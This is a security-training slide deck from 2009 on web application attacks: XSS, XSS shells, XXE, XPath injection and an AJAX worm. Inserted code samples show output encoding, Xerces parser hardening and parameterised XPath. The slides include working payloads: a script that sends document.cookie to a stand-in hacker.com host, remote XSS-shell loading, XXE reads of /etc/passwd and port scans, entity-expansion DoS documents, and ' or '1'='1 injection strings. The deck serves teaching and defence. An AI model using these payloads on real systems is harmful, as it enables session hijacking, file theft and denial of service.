Web Application Security - HSR Lektionen (Hacking-Lab)

Slide 1: Web Application Security, HSR Lektionen

Ivan Bütler
May 2009
www.csnc.ch

Compass Security AG, Glärnischstrasse 7, Postfach 1628, CH-8640 Rapperswil
Tel +41 55-214 41 60, Fax +41 55-214 41 61, team@csnc.ch, www.csnc.ch

Slide 2: E1 - Who am I

- Ivan Bütler, Uznach
- Born 31.12.1970
- Founder of Compass Security AG
- Founder of Swiss Cyber Storm II
- Passionate Security Researcher
- Speaker at Blackhat 2008 Las Vegas
- Husband of Cornelia and father of Tim and Nick (2000/2002)
- Proud Swiss Citizen

Slide 3: IT Security is like kayaking

Moving across water
Continuous paddling
Not moving = losing control!

Slide 4: In front of us ...

There are threats ahead of us

Slide 5: behind us ...

There are threats behind us

Slide 6: Agenda

- OWASP Top 10
- Cross Site Scripting
- AJAX & XML Attacks
- Web 2.0 Worm

Slide 7: OWASP Top 10 (section)

Slide 8: OWASP Top 10 (Q4 2007)

A1 Cross Site Scripting
A2 Injection Flaws (SQLi)
A3 Malicious File Execution (RFI)
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
A6 Information Leakage
A7 Broken Auth & Session Management
A8 Insecure Cryptographic Storage
A9 Insecure Communications
A10 Failure to restrict URL Access

Slide 9: A1: Cross Site Scripting

OWASP Definition

XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

Slide 10: Cross Site Scripting (section)

- Cross-Site Scripting
- Cross-Site Tracing
- Second Order Injection
- HTML Injection

Slide 11: Attack Vector

(Diagram; recovered labels only)

- Protocol
- "Attrackting!!": JavaScript from www.abc.com is loaded to the client (Malware)
- Authentication into Web Application
- Session Hijacking (re-use client session)

Slide 12: JavaScript Malware

JavaScript from www.abc.com is loaded to the client (Malware)

JavaScript Malware
- Was previously loaded to the web application by the attacker
- Exploitation of a Cross Site Scripting vulnerability
- Is part of the "attrackting" vector
- HTML formatted mail including XSS attack vector
- Obfuscated via URL redirection including XSS attack vector

Slide 13: JavaScript

JavaScript
- Program that is run client-side
- Usually automates client activities (clicking, etc.)
- Heavily used in Web 2.0 (Ajax)
- Is able to access the browser environment (document.cookie)
- In normal circumstances it is "good code"
- If used by hackers -> "malicious code"

JavaScript Malware
- Denial of Service attacks
- Spying on the client settings
- Background HTTP requests to foreign web sites
- Clicks through an application automatically (adds malicious payment instructions)
- API for the browser and its features

Slide 14: Session Stealing Sequence

Sequence diagram between Hacker, Client and Web Application:

1. Hacker -> Web Application:
   POST /document.jsp?id=898&value=<script>location.href="http://hacker.com/"+document.cookie</script>
   The Web Application stores the value in the DB.
2. Client -> Web Application:
   GET /app/document.jsp?id=898
   Cookie: session=123
   Response: <script>location.href="http://hacker.com/"+document.cookie</script>
3. Malicious JavaScript performs its own request, Client -> Hacker:
   GET /session=123
   The Hacker stores the request in a log file.

Slide 15: Testing

Play around with different test strings in request parameters
- <script>alert('asdf')</script>
- <script>alert(document.cookie)</script>
- "<script>alert(document.cookie)</script>
- "><script>alert(document.cookie)</script>
- '><script>alert(document.cookie)</script>
- <img src="http://www.bla.com/image.gif" onload="alert(document.cookie)">

In the page returned
- Search for the presence of test strings
- Check how the characters get filtered or changed
- Find out the problem why XSS does not work and try new test strings
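The fix for what slides 14 and 15 probe is output encoding. The following added example (not code from the slides) renders each slide 15 test string into an element body and a quoted attribute value, once raw as the vulnerable document.jsp of slide 14 would and once HTML-entity-encoded, and uses the standard-library HTML parser to report whether a script element or an on* handler attribute survives. The template strings and the ScriptDetector helper are constructed for the example.

```python
"""Output-encoding check for the slide 15 test strings (added example, not from the slides)."""
import html
from html.parser import HTMLParser

# Test strings copied from slide 15.
TEST_STRINGS = [
    "<script>alert('asdf')</script>",
    "<script>alert(document.cookie)</script>",
    '"<script>alert(document.cookie)</script>',
    '"><script>alert(document.cookie)</script>',
    "'><script>alert(document.cookie)</script>",
    '<img src="http://www.bla.com/image.gif" onload="alert(document.cookie)">',
]


class ScriptDetector(HTMLParser):
    """Flags markup that would run script: a <script> element or any on* attribute."""

    def __init__(self):
        super().__init__()
        self.found = False

    def handle_starttag(self, tag, attrs):
        # attrs is a list of (name, value); names arrive lower-cased.
        if tag == "script" or any(name.startswith("on") for name, _ in attrs):
            self.found = True


def executes(markup: str) -> bool:
    """True if the rendered markup still contains executable script."""
    detector = ScriptDetector()
    detector.feed(markup)
    detector.close()
    return detector.found


def render_raw(value: str) -> str:
    """Vulnerable template (like document.jsp on slide 14): the value is echoed unchanged."""
    return f'<p>{value}</p><input type="text" value="{value}">'


def render_encoded(value: str) -> str:
    """Hardened template: &, <, >, " and ' become entities before output."""
    safe = html.escape(value, quote=True)
    return f'<p>{safe}</p><input type="text" value="{safe}">'


def check(strings=TEST_STRINGS) -> dict:
    """Map each test string to (executes when raw, executes when encoded)."""
    return {s: (executes(render_raw(s)), executes(render_encoded(s))) for s in strings}


if __name__ == "__main__":
    for probe, (raw, encoded) in check().items():
        raw_label = "EXEC" if raw else "safe"
        enc_label = "EXEC" if encoded else "safe"
        print(f"raw={raw_label} encoded={enc_label}  {probe}")
```

Entity encoding is sufficient for element bodies and quoted attribute values; unquoted attributes, URL attributes and event-handler or script contexts need their own encoders, which is exactly why slide 15 asks how each character was changed rather than whether the string was merely filtered.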

Slide 16: IFRAME Tag

iframes
- May contain content of other web sites:
  <iframe src="http://www.csnc.ch/" height="300" width="300"></iframe>

Attacks
- Faked login dialogs for phishing attacks
- Retrieval of another page's content

Slide 17: Hacking-Lab

5030 - Cross Site Scripting Lab

Slide 18: Second Order Injection (section)

Slide 19: Introduction

Second-Order Code Injection describes the indirect processing of injected code.
The injected code is not activated immediately by the application.
Primary targets are web applications which are fed with data from other applications.
Second-Order Code Injection is caused by missing input validation or missing output encoding.

Slide 20: Example

(Diagram only; no text recovered.)

Slide 21: Hacking-Lab

2301 Web Security: Second Order Injection - Web Services

Slide 22: XSS Shell (section)

<script src=......>

Slide 23: XSS Shell – Typical Procedure

Sequence diagram between User, Attacker, the vulnerable server and the XSS shell server:

1. Attacker -> server: Infect server with persistent XSS
   <script src="http://xssshellserver/xssshell.asp"></script>
2. User -> server: visit server; client receives XSS
3. Client -> xssshellserver: client requests xss shell code; client loads xss shell code; xss gets persistent
4. Client -> xssshellserver: poll for commands (repeated)
5. Attacker -> xssshellserver: send command
6. Client: execute command; send results (repeated for every command)

Slide 24: Manual Proof of XSS Shell

HTTP Request to XSS vulnerable App

  GET http://www.csnc.ch/webapp/ HTTP/1.1
  Host: www.csnc.ch
  Cookie: CSNC=8iLksLJJpgMB4Zl7MpvjKg2ypbiFEY1wPJl8hUjoh49Z3UNFiddu7YSC4THilnP

HTTP Response from XSS vulnerable App (JavaScript loaded from XSS Shell)

  HTTP/1.0 200 OK
  ...
  <script src="http://www.google.ch/ivan.js"></script>
  ...

HTTP Request to XSS Shell Server

  GET http://www.google.ch/ivan.js HTTP/1.1
  Host: www.google.ch

HTTP Response from XSS Shell Server (the server can access cookies from the vulnerable App)

  HTTP/1.0 200 OK
  alert(document.cookie);

Slide 25: XSS Shell

(Screenshot only; no text recovered.)

Slide 26: XSS Tunnel

- Used as local proxy
- Tunnels traffic over victim connected to xss-shell

Slide 27: XSS Tunnel sequence diagram

Participants: Attacker, XSS Tunnel, vulnerable application, Victim, XSS-Shell

1. Attacker -> vulnerable application: Post blog entry
2. Victim -> vulnerable application: Read blog entry
3. Victim -> XSS-Shell: Get script; begin polling commands from xss-shell (Poll for commands, repeated)
4. Attacker -> XSS Tunnel: Request to local proxy
5. XSS Tunnel -> XSS-Shell: Send commands to xss-shell
6. XSS-Shell -> Victim: Send command (on the next poll)
7. Victim -> vulnerable application: Request to vulnerable application; Response from application
8. Victim -> XSS-Shell: Return response
9. XSS-Shell -> XSS Tunnel: Forward response to xss tunnel client
10. XSS Tunnel -> Attacker: Show response

Slide 28: XSS Shell

- Tested with: Firefox, IE6 and IE7
- Works with persistent XSS or reflected (temporary) XSS
- XSS Shell communication relies on remote JavaScript loading via <script src="..."> to bypass the same-origin policy
- XSS Shell is Open Source

Slide 29: References

XSS Shell & XSS Tunnel: http://www.portcullis-security.com/

Slide 30: Hacking-Lab

2650 RSS Attack and XSSShell

Slide 31: AJAX & XML Security (section)

Slide 32: AJAX Request/Response

(Diagram, Source: Wikipedia; recovered annotations only)

- New engine built into newer browsers!
- Interactive GUI
- Asynchronous processing: not every action needs to be started by pressing the submit button
- Asynchronous processing: AJAX updates the browser window (content)

Slide 33: XMLHttpRequest (XHR)

XmlHttpRequest is a browser API to perform background HTTP requests from JavaScript
Invented by Microsoft in 2000

IE 5.0 / 6.0: COM/ActiveX object "Microsoft.XmlHttp"
- ActiveX must be enabled

IE 7.0, Firefox, Opera, Safari and other browsers: Native JavaScript object "XmlHttpRequest"
- ActiveX not required
- Portable

Slide 34: XMLHttpRequest (XHR)

(Diagram only; no text recovered.)

Slide 35: Data Exchange Formats

- Upstream Data Format
- Downstream Data Format

Slide 36: Upstream Data Formats

Possible data formats:
- GET parameters
- POST parameters
- XML
- SOAP

Some server-side API is provided
- Often maps to server-side objects and their functions
- AJAX calls in this case are like remote method invocations

Slide 37: Upstream: HTTP GET Parameters

  GET /dyn/req?call=foo&arg=bar HTTP/1.1
  ...

Slide 38: Upstream: HTTP POST Parameters

  POST /dyn/req HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  ...

  call=foo&arg=bar

Slide 39: Upstream: XML

  POST /dyn/req HTTP/1.1
  Content-Type: text/xml
  ...

  <?xml version="1.0" encoding="utf-8"?>
  <request connectionId="cxooiqM">
    <call type="foo">
      <argument name="bar">true</argument>
    </call>
  </request>
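Slides 36 to 39 show the server-side method name travelling on the wire, as call=foo&arg=bar or as the XML request document. The following added example (not code from the slides) parses both encodings into one Call record and contrasts the two ways a server can turn that name into a method: looking it up by reflection, which exposes every attribute of the service object to the browser, and an explicit export table. The Service class, its methods and the argument names are constructed for the example.

```python
"""AJAX upstream calls as remote method invocations (added example, not from the slides)."""
from dataclasses import dataclass, field
from urllib.parse import parse_qs
import xml.etree.ElementTree as ET


@dataclass
class Call:
    name: str
    args: dict = field(default_factory=dict)


def parse_form(body: str) -> Call:
    """call=foo&arg=bar from a GET query string or urlencoded POST body (slides 37, 38)."""
    params = parse_qs(body, keep_blank_values=True)
    name = params.get("call", [""])[0]
    args = {k: v[0] for k, v in params.items() if k != "call"}
    return Call(name, args)


def parse_xml(body: str) -> Call:
    """<request><call type="foo"><argument name="bar">true</argument></call></request> (slide 39)."""
    root = ET.fromstring(body)
    call = root.find("call")
    if call is None:
        raise ValueError("no <call> element in request")
    args = {a.get("name", ""): (a.text or "") for a in call.findall("argument")}
    return Call(call.get("type", ""), args)


class Service:
    """Hypothetical server-side object the AJAX layer maps onto (constructed)."""

    def foo(self, arg="", **_ignored):
        return f"foo got {arg!r}"

    def _shutdown(self, **_ignored):
        # Internal helper that must never be callable from the browser.
        return "server stopped"


def dispatch_reflective(service: Service, call: Call):
    """Vulnerable pattern: the wire name is looked up directly on the object."""
    return getattr(service, call.name)(**call.args)


# Explicit export table: wire name -> method. Nothing else is reachable.
ALLOWED = {"foo": Service.foo}


def is_exported(name: str) -> bool:
    return name in ALLOWED


def dispatch_allowlisted(service: Service, call: Call):
    """Hardened pattern: only explicitly exported methods are callable."""
    handler = ALLOWED.get(call.name)
    if handler is None:
        raise PermissionError(f"call {call.name!r} is not exported")
    return handler(service, **call.args)
```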

Slide 40: Upstream: SOAP

  POST /dyn/req HTTP/1.1
  Content-Type: application/soap-xml
  ...

  <?xml version="1.0" encoding="utf-8"?>
  <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope">
    <Body>
      ...
    </Body>
  </Envelope>

Slide 41: Downstream: XML

  HTTP/1.1 200 OK
  Content-Type: text/xml
  ...

  <?xml version="1.0" encoding="utf-8"?>
  <response>
    <result type="login">
      <status>false</status>
      <msg>Username or password invalid.</msg>
    </result>
  </response>

Slide 42: Downstream: JavaScript

  HTTP/1.1 200 OK
  Content-Type: text/javascript
  ...

  LibJs.user='nobody';
  LibJs.groups=['member','nobody','wnc5Xh'];
  $L('kYP64i').__render([$E('h1',{className:'Compiled',attributes:{},children:[$T(LibJs.Compiler.fromAscii('Hello world!'))] ...
  LibJs.Server.__onComplete(1664);

Slide 43: Downstream: JSON

  HTTP/1.1 200 OK
  Content-Type: text/x-json
  ...

  {"menu": {
    "id": "file",
    "popup": {
      "menuitem": [
        {"value": "New", "onclick": "NewDoc()"},
        {"value": "Open", "onclick": "OpenDoc()"},
        {"value": "Close", "onclick": "CloseDoc()"}
      ]}}}

Slide 44: Downstream: Custom

  HTTP/1.1 200 OK
  Content-Type: text/x-gwt
  ...

  {OK}["53723","84268","78357","27843"]

Slide 45: XML Attack Vector (section)

Slide 46: Attack Targets

Possible attack targets
- network service
- XML generator
- XML parser
- application code

Conclusion
- XML core security standards are only of limited value when the XML generator or parser is the target of the attack.
- Therefore additional protection is required.

Slide 47: XML Parser Attacks (section)

Slide 48: XML Parser Attacks

XML technology allows the marshaling work to be offloaded
- No custom serialization protocols required
- Generic approach to handle different data structures
- Easy transformation of XML documents into business objects

Therefore XML parsers are very powerful
- highly generic
- highly dynamic

This is the foundation for XML parser based attacks!

Slide 49: XML Parser: Verbose Error Messages

Often XML parsers return very verbose information about the problems that occurred
- Schema definitions and the location where the parsing error has occurred.
- Java Stack Traces or parts of them

  <error>
    <message>
      XMLParserError: Error on line 3: cvc-complex-type.2.4.b: The content of element 'header' is not
      complete. It must match '(((((((("":senderid), "":reference)), ("":receipientid){0-1}),...'.
    </message>
  </error>

Slide 50: XML Parser: Overlong XML Documents

Although recursive entity definitions are not allowed by XML, overlong documents can still be constructed

  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE sample [
    <!ENTITY x100 "A very CPU consuming task :)">
    <!ENTITY x99 "&x100;&x100;">
    ...
    <!ENTITY x1 "&x2;&x2;">
  ]>
  <SOAP-ENV:Envelope xmlns:SOAP-ENV=...>
    <SOAP-ENV:Body>
      <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV=...>
        <sample xsi:type="xsd:string">&x1;</sample>
      </ns1:aaa>
    </SOAP-ENV:Body>
  </SOAP-ENV:Envelope>

Slide 51: XML Parser: Overlong XML Documents

Attack on DOM parser

  <?xml version="1.0" encoding="UTF-8"?>
  <dom-attack>
    <dom-attack>
      <dom-attack>
        <dom-attack>
          <dom-attack>
            <dom-attack>
              <dom-attack>...</dom-attack>
            </dom-attack>
          </dom-attack>
        </dom-attack>
      </dom-attack>
    </dom-attack>
  </dom-attack>

Slide 52: XML Parser: XXE

XXE -> XML External Entity Attacks

Attack Range
- DoS – Denial of Service Attacks
- Inclusion of local files into XML documents
- Port scanning from the system where the XML parser is located
- Overloading of XML-Schema from foreign locations

Slide 53

XML Parser: XXE Denial of Service

Denial of Service
- Loading of content from local devices like /dev/zero

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE sample SYSTEM "/dev/zero">
...

Slide 54

XML Parser: XXE Local Connect Scan

Using external DTD references it is possible to perform TCP port scans.

Request
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE sample PUBLIC "..." "http://localhost:99">
...

Response
<?xml version="1.0" encoding="ISO-8859-1"?>
<error>
<type>FATAL</type>
<message>
XMLParserError: Error in building: Connection refused
</message>
</error>

Slide 55

XML Parser: XXE DNS Resolution

Request
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE sample PUBLIC "..." "http://www.csnc.ch:99">
...

Response
<?xml version="1.0" encoding="ISO-8859-1"?>
<error>
<type>FATAL</type>
<message>
XMLParserError: Error in building: Host not found: www.csnc.ch
</message>
</error>

Slide 56

XML Parser: XXE Global Connect Scan

Request
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE sample PUBLIC "..." "http://www.google.com">
...

Response
<?xml version="1.0" encoding="ISO-8859-1"?>
<error>
<type>FATAL</type>
<message>
XMLParserError: Error in building: Connection timeout
</message>
</error>

Slide 57

XML Parser: XXE File Inclusion

DTD allows the inclusion of documents
- XML documents, e.g. web.xml
- Any other file, e.g. /etc/passwd (difficult since XML parsers often require the content to be parseable)

Request
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE request [
<!ENTITY include SYSTEM "/etc/passwd">
]>
<request>
<description>&include;</description>
...
</request>

Slide 58

XML Parser: Example

Request
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE request [
<!ENTITY include SYSTEM "file=/etc/passwd">
]>
<request>
<description>&include;</description>
...
</request>

Response
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh

Slide 59

XML Parser: External XML Schema

XML schemas can be stored remotely.

Request
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap..."
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://schemas.xmlsoap.org/so.../
http://www.hacker.com/hack.txt">
<soapenv:Body>
...
</soapenv:Body>
</soapenv:Envelope>

Note: a space character is required between the namespace URI and the schema URL inside xsi:schemaLocation (the line break above stands for it).

Slide 60

Hacking-Lab

2600 XML Attacks

Slide 61

Mitigation XML Attacks

Xerces Hardening

Slide 62

Xerces Hardening

All previous attacks are the result of weakly configured XML parsers.

To be secure against these attacks the XML parsers need to be hardened.

Hardening is a term which describes a process where a component is set up in the most minimal and secure configuration required to run the application.

Slide 63

Xerces Hardening

The parser can be configured as follows:

SAXParser p = new SAXParser();
p.setFeature("...", true|false);

Validate schemas features
http://xml.org/sax/features/validation → true
http://xml.org/sax/features/namespace-prefixes → true
http://xml.org/sax/features/namespaces → true
http://apache.org/xml/features/validation/schema → true
http://apache.org/xml/features/validation/schema-full-checking

Slide 64

Xerces Hardening

Avoid external entity attacks
http://xml.org/sax/features/external-general-entities → false
http://xml.org/sax/features/external-parameter-entities → false
http://apache.org/xml/features/disallow-doctype-decl → true

Avoid resolving of external XML schema locations
p.setEntityResolver(new MyResolver());

Utilize Security Manager to limit number of nodes and entity expansions (the property takes a SecurityManager instance, not the class name as a string)
p.setProperty("http://apache.org/xml/properties/security-manager", new org.apache.xerces.util.SecurityManager());

Check XML against local server-side schemas and DTDs
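As an added example (not code from the slides), the settings of slides 63 and 64 applied to a Xerces SAXParser and run against constructed versions of the x100..x1 entity chain from slide 50 and the /etc/passwd inclusion from slide 57. It assumes Apache Xerces 2 on the classpath; the class HardenedXerces, its method names and the limits 1000 and 3000 are choices made for this example.

```java
import java.io.IOException;
import java.io.StringReader;

import org.apache.xerces.parsers.SAXParser;
import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public final class HardenedXerces {

    // SAX/Xerces feature and property names as listed on the slides.
    static final String EXT_GENERAL   = "http://xml.org/sax/features/external-general-entities";
    static final String EXT_PARAMETER = "http://xml.org/sax/features/external-parameter-entities";
    static final String NO_DOCTYPE    = "http://apache.org/xml/features/disallow-doctype-decl";
    static final String SEC_MANAGER   = "http://apache.org/xml/properties/security-manager";

    /** Xerces SAXParser configured as the hardening slides recommend. */
    public static SAXParser hardenedParser(boolean allowDoctype) throws SAXException {
        SAXParser p = new SAXParser();

        // Never fetch external general or parameter entities: this stops the
        // /dev/zero, localhost:99 and /etc/passwd references of the XXE slides.
        p.setFeature(EXT_GENERAL, false);
        p.setFeature(EXT_PARAMETER, false);

        // Strongest setting: refuse any DOCTYPE. The x1..x100 entity chain of
        // the overlong-document slide then fails before a single expansion.
        p.setFeature(NO_DOCTYPE, !allowDoctype);

        // If a DOCTYPE has to be accepted, cap entity expansions. The property
        // expects a SecurityManager instance, not the class name as a string.
        org.apache.xerces.util.SecurityManager sm = new org.apache.xerces.util.SecurityManager();
        sm.setEntityExpansionLimit(1000);   // chosen limit; the slide's x1 needs 2^99 expansions
        sm.setMaxOccurNodeLimit(3000);      // chosen cap on content-model nodes from large maxOccurs
        p.setProperty(SEC_MANAGER, sm);

        // Resolve every external reference (DTDs, schema locations) to an empty
        // document, so neither the network nor the file system is touched.
        p.setEntityResolver(new EntityResolver() {
            public InputSource resolveEntity(String publicId, String systemId) {
                return new InputSource(new StringReader(""));
            }
        });
        p.setContentHandler(new DefaultHandler());
        return p;
    }

    /** True if the document is accepted under the hardened configuration. */
    public static boolean accepts(String xml, boolean allowDoctype) {
        try {
            hardenedParser(allowDoctype).parse(new InputSource(new StringReader(xml)));
            return true;
        } catch (SAXException | IOException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    /** Constructed sample: a 20-level version of the slide's x100..x1 entity chain. */
    static String entityChain() {
        StringBuilder dtd = new StringBuilder("<!DOCTYPE sample [<!ENTITY x20 \"A very CPU consuming task :)\">");
        for (int i = 19; i >= 1; i--) {
            dtd.append("<!ENTITY x").append(i).append(" \"&x").append(i + 1).append(";&x").append(i + 1).append(";\">");
        }
        return "<?xml version=\"1.0\"?>" + dtd.append("]>") + "<sample>&x1;</sample>";
    }

    public static void main(String[] args) {
        // Constructed sample: the /etc/passwd inclusion request from the file-inclusion slide.
        String xxe = "<?xml version=\"1.0\"?><!DOCTYPE request [<!ENTITY include SYSTEM \"/etc/passwd\">]>"
                   + "<request><description>&include;</description></request>";
        String plain = "<?xml version=\"1.0\"?><request><description>hello</description></request>";

        System.out.println("entity chain, DOCTYPE forbidden: " + accepts(entityChain(), false));
        System.out.println("entity chain, expansions capped: " + accepts(entityChain(), true));
        System.out.println("xxe request, DOCTYPE forbidden : " + accepts(xxe, false));
        System.out.println("plain request                  : " + accepts(plain, false));
    }
}
```

Forbidding the DOCTYPE is the setting to prefer; the expansion cap and the empty-document resolver are the fallback for applications whose input legitimately carries a DTD.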

Slide 65

XPath Injection

Slide 66

Introduction

Just like relational databases, XML documents need to be queried for information.

To provide a standardized means for querying XML documents, XPath is used.

XPath is a basic XML technology and the foundation for other technologies like
- XSLT
- XQuery

Slide 67

XPath

Let's assume the following XML document is used as a repository for user accounts and their passwords...

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>monsch</username>
<password>V3riKomplikatet</password>
</user>
<user>
<username>buetler</username>
<password>$eCur1tY</password>
</user>
</users>

Slide 68

XPath

... and an application using this XML document to perform authentication using XPath expressions.

//users/user[
  username/text()='monsch' and
  password/text()='V3riKomplikatet'
]

The strings marked red on the slide (monsch and V3riKomplikatet) are the ones embedded from the login form.

But wait?
- Doesn't this resemble SQL Injection attacks?

Slide 69

XPath Injection

Slide 70

XPath Injection

Yes it does!

Unvalidated input parameters can lead to an XPath Injection attack.

//users/user[
  username/text()='monsch' and
  password/text()='' or '1'='1'
]

This query selects all user nodes within the XML document.

Slide 71

XPath Injection

' or '1'='1

Slide 72

XPath Injection

But if the application tests the number of returned results it probably won't work!

To get a more targeted attack an educated guess can be made about the name of the username node.

This way the attack can be launched against a specific user:

//users/user[
  username/text()='monsch' and
  password/text()='' or '1'='1' and
  username/text()='monsch'
]

Slide 73

XPath Injection

' or '1'='1' and username/text()='monsch'
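Added example, not part of the slides: the user repository of slide 67 queried first with the concatenated expression of slide 68 and then with the same predicate using XPath variables, through the JDK's javax.xml.xpath API. The class name XPathLogin, the method names and the variable names $user and $pass are choices made for this example.

```java
import java.io.StringReader;

import javax.xml.namespace.QName;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import javax.xml.xpath.XPathVariableResolver;

import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

public final class XPathLogin {

    // The user repository from the XPath slides, embedded as a string for this example.
    static final String USERS =
          "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>"
        + "<users>"
        + "<user><username>monsch</username><password>V3riKomplikatet</password></user>"
        + "<user><username>buetler</username><password>$eCur1tY</password></user>"
        + "</users>";

    static Document load(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Same idea as the Xerces hardening slides: no DOCTYPE, hence no entity tricks.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return f.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
    }

    /** Vulnerable variant: the login form values are concatenated into the expression. */
    static int matchingUsersVulnerable(Document doc, String user, String pass)
            throws XPathExpressionException {
        String expr = "//users/user[username/text()='" + user
                    + "' and password/text()='" + pass + "']";
        NodeList hits = (NodeList) XPathFactory.newInstance().newXPath()
                .evaluate(expr, doc, XPathConstants.NODESET);
        return hits.getLength();
    }

    /** Hardened variant: the values are bound as XPath variables, so a quote in
     *  the input is compared as data and cannot change the predicate's structure. */
    static int matchingUsersSafe(Document doc, final String user, final String pass)
            throws XPathExpressionException {
        XPath xpath = XPathFactory.newInstance().newXPath();
        xpath.setXPathVariableResolver(new XPathVariableResolver() {
            public Object resolveVariable(QName name) {
                if ("user".equals(name.getLocalPart())) return user;
                if ("pass".equals(name.getLocalPart())) return pass;
                return null;
            }
        });
        String expr = "//users/user[username/text()=$user and password/text()=$pass]";
        NodeList hits = (NodeList) xpath.evaluate(expr, doc, XPathConstants.NODESET);
        return hits.getLength();
    }

    public static void main(String[] args) throws Exception {
        Document doc = load(USERS);
        String untargeted = "' or '1'='1";                               // password field, slide 70
        String targeted   = "' or '1'='1' and username/text()='monsch";  // password field, slide 72

        // Concatenated: the predicate gains an "or '1'='1'" branch, so the untargeted
        // value matches every user node and the targeted one exactly the monsch node.
        System.out.println(matchingUsersVulnerable(doc, "monsch", untargeted));
        System.out.println(matchingUsersVulnerable(doc, "monsch", targeted));
        // Variables: both values are merely wrong passwords and match no node;
        // only the genuine credentials match a single user.
        System.out.println(matchingUsersSafe(doc, "monsch", untargeted));
        System.out.println(matchingUsersSafe(doc, "monsch", targeted));
        System.out.println(matchingUsersSafe(doc, "monsch", "V3riKomplikatet"));
    }
}
```

Checking that exactly one node is returned, as slide 72 mentions, is a useful extra guard but no substitute for keeping input out of the expression text.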

Slide 74

AJAX Worms Analysis

Slide 75

Meebo Worm Movie

http://milw0rm.org/video/watch.php?id=71

Slide 76

What is meebo.com

Meebo is a web 2.0 (AJAX) based instant messaging platform

Users can chat with each other over a web client

Slide 77

Meebo.com Vulnerabilities

The messaging functionality is vulnerable to Cross-Site-Scripting (XSS)

The following script is executed:

<HTML>yo<SCRIPT a=">'>">alert('XSS');</SCRIPT></HTML>

This vulnerability could be used to steal session cookies, ... (typical Web 1.0 XSS case)

It can also be used to code a worm that propagates over the messaging functionality

Slide 78

Impact

XSS Worm propagates without user input.

Availability of meebo.com can be affected

An attacker could gather session cookies

0-Day Exploits can be distributed by XSS-Worms

Slide 79

Propagation

Friendship (propagation diagram)

Slide 80

Propagation

Step 1: initial Message
- A sends infected Message to B

Step 2: Javascript is Executed
- Javascript is executed on B
- The script looks for all buddies from B and looks for itself in the HTML document.

Step 3: Javascript is sent to buddies from B
- All Buddies from B (including A) get the infected message

Step 4: Javascript is executed
- Javascript is executed on A, C, D
- The script looks for all buddies and sends itself to these

Step 5: ....

Slide 81

Analyzing the Worm Code

(Annotated screenshot of the worm source; the callouts read:)
- Payload, this would be the malware. Just a simple "infected by" alert box
- Get Script from window and close window. After closing window, return the script
- Gets all buddies (gBuddyList) and sends the result from getScriptSelfAndClose to every buddy
- First step: propagation; second step: infection

Slide 82

Solution

This problem is the same as in known XSS-vulnerable applications

Always perform Output Encoding.
- < → &lt;
- > → &gt;
- & → &amp;
- ...

As a second priority perform Input Filtering of dangerous characters such as: <, >, ", ', &, %
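Added example (not the slides' code): the encoder that the table above describes, applied to the Meebo message of slide 77, beside the second-priority character filter. It covers HTML text and quoted attribute values only; data placed inside JavaScript or URLs needs its own encoding. The class and method names are choices made for this example.

```java
public final class OutputEncoding {

    /** Output encoding for HTML text and quoted attribute values: the three
     *  characters from the slide plus both quote characters. */
    public static String encodeForHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Second-priority input filter from the slide: rejects a message that
     *  contains any of < > " ' & %. It narrows the input but does not replace
     *  the encoder, which must still run on every output path. */
    public static boolean isAcceptableInput(String s) {
        for (int i = 0; i < s.length(); i++) {
            if ("<>\"'&%".indexOf(s.charAt(i)) >= 0) return false;
        }
        return true;
    }

    public static void main(String[] args) {
        // The message that triggered the Meebo XSS, as printed on the vulnerability slide.
        String meebo = "<HTML>yo<SCRIPT a=\">'>\">alert('XSS');</SCRIPT></HTML>";
        System.out.println("filter accepts : " + isAcceptableInput(meebo));
        System.out.println("encoded output : " + encodeForHtml(meebo));
        // Encode exactly once, at output time: already-encoded data gets mangled.
        System.out.println("double encoded : " + encodeForHtml("a&amp;b"));
    }
}
```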

Slide 83

Other popular XSS Worms

Yamanner Worm (June 2006)
- Yahoo Webmail infected.
- Read out users' contacts and sent itself to these
